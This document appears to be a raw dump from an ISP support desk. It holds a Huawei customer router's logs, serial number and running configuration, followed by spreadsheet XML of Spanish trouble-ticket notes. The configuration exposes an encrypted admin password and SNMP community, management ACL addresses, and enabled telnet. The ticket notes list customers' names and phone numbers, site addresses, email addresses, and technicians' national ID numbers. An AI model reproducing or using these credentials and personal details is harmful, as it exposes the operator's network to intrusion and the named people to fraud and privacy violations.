MAY 18 2022 15:49:17+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[15]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE DOWN STATE.
MAY 18 2022 15:49:17+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[16]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO DOWN STATE.
MAY 18 2022 15:49:09+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[17]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 18 2022 15:49:09+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[18]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 15:49:09+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[19]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 15:48:35+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[20]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=UNKNOWN, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 18 2022 15:48:34+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[21]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE DOWN STATE.
MAY 18 2022 15:48:34+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[22]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO DOWN STATE.
MAY 18 2022 15:35:10+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[23]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 15:11:13+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[24]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAY 18 2022 15:08:43+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[25]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAY 18 2022 15:05:04+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[26]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAY 18 2022 15:04:30+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[27]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAY 18 2022 15:01:47+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[28]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 15:00:47+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[29]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAY 18 2022 15:00:29+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[30]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAY 18 2022 14:34:02+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[31]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 14:34:02+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[32]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 14:33:57+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[33]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE DOWN STATE.
MAY 18 2022 14:33:57+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[34]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO DOWN STATE.
MAY 18 2022 14:33:04+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[35]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 18 2022 14:33:04+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[36]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 14:33:04+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[37]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 14:33:01+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[38]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=UNKNOWN, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 18 2022 14:33:00+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[39]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE DOWN STATE.
MAY 18 2022 14:33:00+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[40]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO DOWN STATE.
MAY 18 2022 14:32:55+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[41]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 18 2022 14:32:55+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[42]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 14:32:55+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[43]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:52+00:00 ID1148060 %%01IFPDT/4/DRVICOUTSTR(L)[44]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
MAY 18 2022 14:32:52+00:00 ID1148060 %%01IFPDT/4/DRVICOUTSTR(L)[45]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
MAY 18 2022 14:32:44+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[46]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:43+00:00 ID1148060 %%01DEV/4/ENTUP(L)[47]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
MAY 18 2022 14:32:37+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[48]:INTERFACE GIGABITETHERNET0/0/5 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:36+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[49]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:36+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[50]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:25+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[51]:THE LINE PROTOCOL IP ON THE INTERFACE VLANIF1 HAS ENTERED THE UP STATE.
MAY 18 2022 14:32:25+00:00 ID1148060 %%01IFNET/4/IF_STATE(L)[52]:INTERFACE VLANIF1 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:24+00:00 ID1148060 %%01RM/4/ROUTERID_CHANGE(L)[53]:THE ROUTER ID IS 201.247.177.86. (INSTANCEID=0)
MAY 18 2022 14:32:20+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[54]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
MAY 18 2022 14:32:20+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[55]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
MAY 18 2022 14:32:19+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[56]:INTERFACE WLAN-BSS0 HAS TURNED INTO UP STATE.
MAY 18 2022 14:31:46+00:00 ID1148060 %%01IFPDT/4/DRVICOUTSTR(L)[57]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
MAY 18 2022 14:30:56+00:00 ID1148060 %%01GTL/4/STATECHANGED(L)[58]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;ID1148060&gt;DISP CLOCK
2022-05-18 23:53:45
WEDNESDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;ID1148060&gt;DISP SN
EQUIPMENT SN(ESN): 21500103042SKA607107
LICENSE ESN: 21500103042SKA607107
SLOT  SUB TYPE             SN                       P/N
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     --  AR129CGVW-L      21500103042SKA607107     50010304
&lt;ID1148060&gt;DISP CUR
[V200R009C00SPC500]
#
 SYSNAME ID114806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01.247.155.225
DNS SERVER 201.247.157.225
DNS DOMAIN CLARO.COM.SV
#
DHCP ENABLE
#
RADIUS-SERVER TEMPLATE DEFAULT
#
PKI REALM DEFAULT
 RSA LOCAL-KEY-PAIR DEFAULT
#
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.0 TLS1.1
 CIPHERSUITE RSA_AES_128_CBC_SHA
#
ACL NUMBER 2000
 DESCRIPTION SNMP_GESTION
 RULE 5 PERMIT SOURCE 10.55.197.38 0
 RULE 10 PERMIT SOURCE 10.55.197.30 0
 RULE 15 PERMIT SOURCE 10.55.197.19 0
ACL NUMBER 2088
 DESCRIPTION MONITOREO DE CLARO
 RULE 5 PERMIT SOURCE 10.255.24.144 0.0.0.7
 RULE 10 PERMIT SOURCE 190.148.15.192 0.0.0.15
ACL NUMBER 2097
 DESCRIPTION SNMP_FILTER
 RULE 5 PERMIT SOURCE 10.95.61.11 0
 RULE 10 PERMIT SOURCE 10.95.61.15 0
 RULE 15 PERMIT SOURCE 10.95.61.31 0
 RULE 20 PERMIT SOURCE 201.247.246.11 0
 RULE 25 PERMIT SOURCE 201.247.156.100 0
 RULE 30 PERMIT SOURCE 201.247.156.93 0
ACL NUMBER 2098
 DESCRIPTION TELNET_FILTER
 RULE 5 PERMIT SOURCE 10.95.61.100 0
 RULE 10 PERMIT SOURCE 201.247.153.253 0
 RULE 15 PERMIT SOURCE 10.95.61.11 0
 RULE 20 PERMIT SOURCE 10.95.60.250 0
 RULE 25 PERMIT SOURCE 201.247.246.11 0
 RULE 30 PERMIT SOURCE 168.243.136.20 0
#
ACL NUMBER 3000
 RULE 5 PERMIT IP SOURCE 192.168.1.0 0.0.0.255
#
IKE PROPOSAL DEFAULT
 ENCRYPTION-ALGORITHM AES-256
 DH GROUP14
 AUTHENTICATION-ALGORITHM SHA2-256
 AUTHENTICATION-METHOD PRE-SHARE
 INTEGRITY-ALGORITHM HMAC-SHA2-256
 PRF HMAC-SHA2-256
#
TRAFFIC CLASSIFIER RESTRICCION_30M OPERATOR AND
 IF-MATCH ANY
#
TRAFFIC BEHAVIOR RESTRICCION_30M
 CAR CIR 30720 PIR 30720 CBS 962560 PBS 1602560 MODE COLOR-BLIND GREEN PASS YELLOW PASS RED DISCARD
#
TRAFFIC POLICY RESTRICCION_30M
 CLASSIFIER RESTRICCION_30M BEHAVIOR RESTRICCION_30M PRECEDENCE 5
#
FREE-RULE-TEMPLATE NAME DEFAULT_FREE_RULE
#
PORTAL-ACCESS-PROFILE NAME PORTAL_ACCESS_PROFILE
#
IP POOL DHCP
 GATEWAY-LIST 192.168.1.1
 NETWORK 192.168.1.0 MASK 255.255.255.0
 DNS-LIST 201.247.155.225 201.247.157.225 8.8.8.8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T3LN0CR3D3S PASSWORD IRREVERSIBLE-CIPHER %^%#HWU]*A/HPR';JQG#LA"&amp;/#PH);CV03.T#%I7;QLY85S2;IB!`5"M{.LQO&amp;7S%^%#
 LOCAL-USER T3LN0CR3D3S PRIVILEGE LEVEL 15
 LOCAL-USER T3LN0CR3D3S SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION RED LAN CLIENTE
 IP ADDRESS 201.247.177.86 255.255.255.252
 IP ADDRESS 192.168.1.1 255.255.255.0 SUB
 DHCP SELECT GLOBAL
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL /_/ID1148060SV/_/
 BANDWIDTH 30720
 IP ADDRESS 10.149.89.161 255.255.255.252
 NAT OUTBOUND 3000 INTERFACE VLANIF 1
 TRAFFIC-POLICY RESTRICCION_30M INBOUND
 TRAFFIC-POLICY RESTRICCION_30M OUTBOUND
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS0
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.22.229 255.255.255.255
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB035CE883E46702
 SNMP-AGENT COMMUNITY READ %^%#RYT+0);RELUQL:KRUR+UT:&amp;+6.R^YXEZZK!Q*&amp;G3OOUI$X)C5*Q`=GOR.{IYW3"9NLVQ1;Z\=P:E{%DT%^%# ACL 2988
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.149.89.162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t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS FUNES 70655316 INDICA QUE AUN NO CUENTA CON SERVICIO LE APARECE SIN ACCESO || SE NOTIFICA A GESTOR**
-ID 1001564586
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE. SR CARLOS FUNES 70655316 SOLICITA VALIDAR CON SR.  JOSE BONILLA 72691932</t>
  </si>
  <si>
    <t>F4611892</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY ESCOBAR AL 47409160 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001566428
**</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR JULIO CARRANZA 42170418 ID: 1001592042/1001592145 UBICA A DANIEL VASQUEZ Y LO PONE EN LA LÍNEA, SE PROCEDE A UBICAR A GESTOR DARWINH.ESPANA ID: 1001593034/1001593253 NO RESPONDE, SE LE CITA POR SKYPE E INDICA QUE TIENE OTRO CLIENTE EN LÍNEA, POR LO QUE SE CONTACTA A CNOC ID: 1001593318 Y NO HAY RESPUESTA, SE ESCALA CON LÍDER KEVYN FONSECA 41284612 ID: 1001594700/1001595485 Y COLOCA EN LÍNEA A GESTOR DARWINH.ESPANA SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4611894</t>
  </si>
  <si>
    <t>CLIENTE UBICA ASMI 54L EL CUAL ESTA ALARMADO DE LA SIGUIENTE FORMA
PWR - VERDE
SYNC A - VERDE - ROJO INTERMITENTE
ALM - ROJO
CLIENTE INDICA QUE YA REINICIO EL EQUIO ASMI 54L Y LA PBX PANASONIC PERO EL SERVICIO NO RESTABLECE, SE PROCEDERA CON EL ENVIO DE PERSONAL PARA VERIFICAR LOS EQUIPOS Y EL ESTADO DE LA UM
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSMIN VASQUEZ 55936830 - 30268181  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001605577  - 1001606069</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ROSMIN VASQUEZ/   ADMINISTRACION 55936830/ 30268181 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4611897</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESVIN CORTEZ 47405754 MENCIONA QUE LA ENERGIA ELECTRICA ESTA BIEN
CLIENTE REALIZA UN REINICIO PERO EL INCONVENIENTE PERSISTE
-ID 1001564947
NOMBRE DEL CLIENTE: DROGUERIA CENTRO HISTORICO S.A.
UBICACIÓN:02 CALLE 0-52 ZONA 1 BARRIO LA ESPERANZA JALAPA
CONTACTO EN SITIO: ESVIN CORTEZ - 47405754
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4611898</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 13:27
PARA: DNAJERA@ACCESOFINANCIERO.COM.HN &lt;DNAJERA@ACCESOFINANCIERO.COM.HN&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 1422867OH |ACCESO FINANCIERO |BARRIO EL CENTRO, PLAZA LIBERTAD LOCAL #5 CONTIGUO A ELEKTRA.
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 1422867OH |ACCESO FINANCIERO |BARRIO EL CENTRO, PLAZA LIBERTAD LOCAL #5 CONTIGUO A ELEKTRA.
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
DARWIN CRUZ
0209-1987-00763
OLVIN DOMINGUEZ
0208-1993-00382
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARMEN CANO 33552552 MENCIONA QUE EL INCONVENIENTE PERSISTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001582175</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARMEN CANO AL 33552552 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001735919
**</t>
  </si>
  <si>
    <t>F4611916</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DANIEL LOPEZ 31774988 CONTESTA EL SEÑOR SANIER INDICA QUE SI CUENTAN CON ENERGIA QUE EL EQUIPO ESTA ENCENDIDO SE SOLICITA QUE SE APLIQUE UN REINICIO AL EQUIPO, APLICA EL REINICIO PERO NO LEVANTA EL SERVICIO SE SOLICITAN DATOS DE VISITA **
HORARIO DE ATENCION: 8:00 AM A 11:00 AM Y DE 12:00 A 16:00 HRS
GESTION DE PERMISOS:  SOLO IDENTIFICADOS
DIRECCION: 1 Y 2 CALLE 10 AVE. BARRIO SANTA ANITA
ATENDERA EN SITIO: SANIER LOPEZ
-ID 1001567611
**</t>
  </si>
  <si>
    <t>F4611923</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE JAIRO GUTIERREZ 47348899, CLIENTE APOYA A UBICAR EQUIPOS</t>
  </si>
  <si>
    <t>CLIENTE JAIRO GUTIERREZ 47348899 VALIDA QUE EL SERVICIO YA NO HA PRESENTADO INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO. ID: 1001632499</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI52 ALARMADO SE PROCEDE A REINICIAR Y E1 RESTABLECE, ADICIONAL SE CORRIGE REGISTRO EN AETHRA 6044. SERVICIO RESTABLECE, CLIENTE JAIRO GUTIERREZ 47348899 REALIZA PRUEBAS DE LLAMADAS Y VALIDA EL E1 OPERATIVO. SOLICITA SE VALIDE EN 1 HORA. ID DE LLAMADA: 1001577790
&lt;CHMLGTCMN1T2C06B02EIM2&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO 10.72.243.90
  PING 10.72.243.90: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    ...................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.72.243.90 PING STATISTICS ---
    1010 PACKET(S) TRANSMITTED
    975 PACKET(S) RECEIVED
    3.46% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 9/9/14 MS
HOSPINAC\VOIP\TRUNK\SIP-HOSPINAC&gt;&gt;SHOW STATUS -S
STATUS OF SIP-HOSPINAC
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : VLAN-3737-VOIP UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2457 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
NO CONNECTIONS</t>
  </si>
  <si>
    <t>F4611925</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR AL CLIENTE PERO NO SE OBTIENE RESPUESTA
1001607423
COLA:
NOMBRE: A: 23049696
NÚMERO: 23049696
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NINGÚN USUARIO RESPONDE (CÓDIGO CAUSA ISDN 18)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 23049696
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 22/06/2022 10:41:17</t>
  </si>
  <si>
    <t>F4611926</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTIN QUINTANILLA 70605028 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001696503</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE DESPUES DEL REINICIO EQUIPO SIGUE EN EL MISMO ESTADO, SE PROCEDE A ENVIAR PERSONAL TECNICO PARA LA REVISION DE LOS EQUIPOS
##LLMAADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA UBICANDO EQUIPOS EN SITIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE PROCEDE A CONTACTAR CON CLIENTE MARTIN QUINTANILLA 70605028
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTIN QUINTANILLA 70605028 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001698744</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO ULLOA 77479997 MENCIONA NUMERO EQUIVOCADO
-ID 1001696834</t>
  </si>
  <si>
    <t>F4611931</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS MARIO 77431927 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001697532</t>
  </si>
  <si>
    <t>F4611932</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: RE: ENLACE ALARMADO CC_BAM_GT_AGENCIA_069</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AURA 22355651 CONTESTA LA SEÑORITA JASMIN INDICA QUE AUN NO TIENEN RESPUESTA DEL CORREO PARA CONFIRMAR LA VISITA Y LOS ACCESOS INDICAN QUE LE ESTARAN DANDO SEGUIMIENTO Y NOS ESTARIAN AVISANDO CUANDO TENGAN RESPUESTA**
-ID 3001866983
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AURA 22355651 MENCIONA QUE AUN NO TIENEN AUTORIZADOS LOS PERMISOS
CLIENTE INDICA QUE CUANDO TENGA LOS PERMISOS ESTARA RESPONDIENDO POR CORREO
-ID 2001584844</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA ATIENDE AURA GERENTE DE LA AGENCIA SE LE SOLICITA APOYO CON VALIDARA ESTADO DE LOS EQUPOS, INDICA QUE LOS CABLES ESTAN TODOS ENREDADES POR LO QUE RECOMIENDA QUE PERSONAL TECNICO REALICE LAS REVISIONES CORRRESPONDINETES SE ADJUNTA LOG DE LA LLAMADA
1001940321
COLA:
NOMBRE: A: 23386565
NÚMERO: 23386565
DURACIÓN: 0:19:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 23386565
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 23/06/2022 16:21:37</t>
  </si>
  <si>
    <t>F4611934</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUE REPORTA 41545604  GIOVANY HERNANDEZ QUIEN VALIDA SERVICIO Y AUTORIZA CIERRE DE TICKET
1001700273
COLA:
NOMBRE: A: 41545604
NÚMERO: 41545604
DURACIÓN: 0:02:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41545604
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 22/06/2022 15:11:17
REPORTE::::: CAIDA TOTAL
CAUSA RAIZ:: EL SERVICIO ESTUVO AFECTADO POR ENERGIA EN NODO
SOLUCION:::: PERSONAL TECNICO TECNICO AXEL SARPEC  TELEFONO: 58263317 QUIEN INDICA QUE YA LE PERMITIERON EL INGRESO A CELDA, COCODES NO LES PERMITEN INGRESO A CELDA, Y LO QUE ENCONTRO FUE UN BREKER DISPARADO, AL CORREGIRLO SERVICIO YA SE OBSERVA OPERATIVO Y ESTABLE</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A INGENIERIA.
826900017T - DISEÑO</t>
  </si>
  <si>
    <t>F4611936</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR GARVANZA 45710593 MENCIONA QUE EL SERVICIO PRESENTA LENTITUD
CLIENTE MENCIONA QUE HAN PRESENTADO FUERTES LLUVIAS Y EN LA ZONA NO HAY MUCHA COBERTURA
-ID 1001570346</t>
  </si>
  <si>
